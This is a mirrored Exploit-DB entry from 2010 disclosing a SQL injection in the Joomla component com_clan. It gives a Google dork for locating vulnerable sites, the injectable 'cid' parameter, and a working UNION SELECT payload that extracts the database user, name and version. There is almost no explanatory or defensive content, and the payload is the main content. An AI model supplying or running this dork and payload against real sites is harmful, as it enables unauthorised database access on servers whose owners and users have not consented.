Joomla! Component com_clan – SQL Injection

• Exploit Database
• 14 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2010-11-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15454/

• Joomla Component com_clan Sql Injection Vulnerability
  ==============================================================
  
  http://joomlacode.org/gf/project/com_clan/
  
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
  .:. Dork : inurl:"com_clan"
  
  ####################################################################
  ===[ Bug ]===
  
  www.site.com/index.php?action=com_clan&cid=185[Sql Injection]
  
  ===[ Exploit ]===
  
  185+and+1=2+union+select+1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),8
  
  ####################################################################